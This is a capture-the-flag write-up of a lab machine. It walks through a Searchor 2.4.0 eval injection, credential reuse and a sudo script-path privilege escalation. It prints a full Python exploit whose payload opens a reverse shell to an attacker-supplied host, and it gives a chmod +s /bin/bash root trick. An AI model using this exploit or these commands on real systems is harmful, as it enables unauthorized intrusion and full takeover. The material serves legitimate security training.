Nmap

Like always, I’m going to scan the IP Address by using nmap but I’m going to scan the full port first. Then, I’m going to scan the only open ports.

nmap -p22,80 -sCV -oN nmap/busqueda 10.10.11.208

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_  256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)

80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://searcher.htb/
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

The nmap scan result is completed. There are just two port opens which are SSH, HTTP. Well, I’m going to ignore port 22 which is SSH, since I don’t have any credentials.

On top of that, nmap also found the hostname called searcher.htb and I’m going to add that to the /etc/hosts file.

add hostname in /etc/hosts

Http: searcher.htb

With that information in hand. I’ve navigated to port 80 through my browser and I’ve been greeted with this page. It’s a simple web application with a dropdown of search engine and an input prompt.

searcher webpage

At the bottom of this page. It shows the application name and the build version, which is Searchor 2.4.0 and it’s linking into this github repository.

searchor version

Foothold: Searchor 2.4.0

With a simple search on Google about this particular version. I came across this github repository which included the POC.

Below is the vulnerable code that leads this exploit to work. It’s using the eval function and follow with {engine} and {query} as input.

vulnerable code in github

So, I make a simple exploit in python based on this POC by using python reverse shell as the payload.

#!/usr/bin/env/python3
# Searchor 2.4.0 POC
# Description:
#   https://github.com/ArjunSharda/Searchor/commit/29d5b1f28d29d6a282a5e860d456fab2df24a16b
#   https://github.com/nexis-nexis/Searchor-2.4.0-POC-Exploit-/blob/main/README.md
#   https://github.com/nexis-nexis/Searchor-2.4.0-POC-Exploit-/tree/main
#   https://security.snyk.io/package/pip/searchor/2.4.0

import requests
import sys
#p = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def send_req(url, ip, port):
    payload = "', exec(\"import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('{}',{}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);\"))#".format(ip, port)
    data = {'engine':'Accuweather','query':f'{payload}'}
#    requests.post(url, data=data, proxies=p)
    requests.post(url, data=data)

if __name__=="__main__":
    try:
        url = sys.argv[1].strip()
        ip = sys.argv[2].strip()
        port = sys.argv[3].strip()
    except IndexError:
        print("[-] Usage: {} <url> <attacker_ip> <attacker_port>".format(sys.argv[0]))
        print('[-] Example: {} "http://example.com/search" "10.10.10.10" "1111"'.format(sys.argv[0]))
        sys.exit(1)

    print("[!] Sending the payload...")
    send_req(url, ip, port)

Shell: svc

Upon successfully executing the exploit. I’m in as a svc user and the best thing to do is upgrade my shell. On top of that, I’m in the /var/www/app directory.

shell as svc

While listing the /var/www/app directory. I found a hidden directory called .git and a config file in there.

found config file in .git directory

The config file, it’s contains the password of a user called cody and a subdomain called gitea. So, I added that into my /etc/hosts file.

found cody credentials

add gitea.searcher.htb in /etc/hosts

Http: gitea.searcher.htb (cody)

Then, I navigated through the browser and successfully login as cody. Unfortunately, there’s nothing that I found interesting.

login as cody in gitea

However, there are two users on it, which is the user that I used for login now and the administrator user.

found administrator user in gitea

Now, I’m curious to see if this user called cody exists on the box. So, I’ll check the user and found out, only two users that exit.

check user exist on the box

SSH: svc

From the nmap scan result above. It shows the port 22 which is SSH, and it’s open. Then, I’ll try the credentials that I found earlier alongside the svc user and it works.

ssh as svc

Since I have the password of this user. I’m going to check the sudo permission with the sudo -l command. Fair enough, I can run a python script that is located in the /opt directory called system-checkup.py.

check sudo permission

SSH: system-checkup.py help

When I ran it, it’s listing three possible commands that I could use. However, one of the commands which is full-checkup seems like not working or it’s just a print function.

full-checkup not working

SSH: system-checkup.py docker-ps

I executed the docker-ps command and it’s showing the docker process on the machine. Surprisingly, one of the docker containers was an image of the mysql database. I’ll try connecting to the mysql and it’s failed.

system-checkup docker-ps

SSH: system-checkup.py docker-inspect

When I executed the docker-inspect command, it throws an error that require some arguments.

system-checkup docker-inspect

So, I’m searching in the ocean of the internet and found this article that talks about this particular command which is docker-inspect.

Then, I executed this command to dump the config file of the mysql database by appending the container id into it.

dump mysql docker config

Luckily, I found the admin credentials of the mysql database. However, when I’ll try to connect to it. It’s failed. So, I’m going to execute another command to show the docker ip address.

found the docker ip address

SSH: mysql

I managed to connect to it as the root user by supplying this ip address 172.19.0.3 as a host. Unfortunately, I can’t find anything that interesting, and feels like I’m stuck.

connect to mysql as root

Http: gitea.searcher.htb (administrator)

Then, I’ll try all the credentials that I found earlier on any input that I can find. Luckily, I managed to log in as an administrator user on the gitea page.

administrator gitea repository

On top of that, administrator has a repository called scripts that contains a file called system-checkup.py and full-checkup.sh, which is svc user can execute it with sudo permission.

Http: gitea.searcher.htb (full-checkup.sh)

However, when I ran the full-checkup command earlier, it did not work and I thought maybe it was just a print function that got executed. So, I’ll check that file, and I was completely wrong.

full-checkup source code

Http: gitea.searcher.htb (system-chekup.py)

I ended up checking the system-chekup.py source code and I spotted the problem in line 47. If the user supplies the full-checkup command, it’s going to execute a bash file named full-checkup.sh in the current directory.

system-checkup source code

To prove it, I’m going to execute the command in different directories. First, at the /home/svc/ directory, and second, it’s going to be in the /opt/scripts/ directory, where’s the scripts located.

ran the script in the different directory

PrivEsc: system-checkup.py

From the result above, I can create a malicious bash file called full-checkup.sh and execute with the sudo permission.

I’m going to use a simple payload such as chmod +s /bin/bash, which is turn a /bin/bash binary into a Set UID binary. Then, I can execute as /bin/bash -p to get the root shell.

becoming root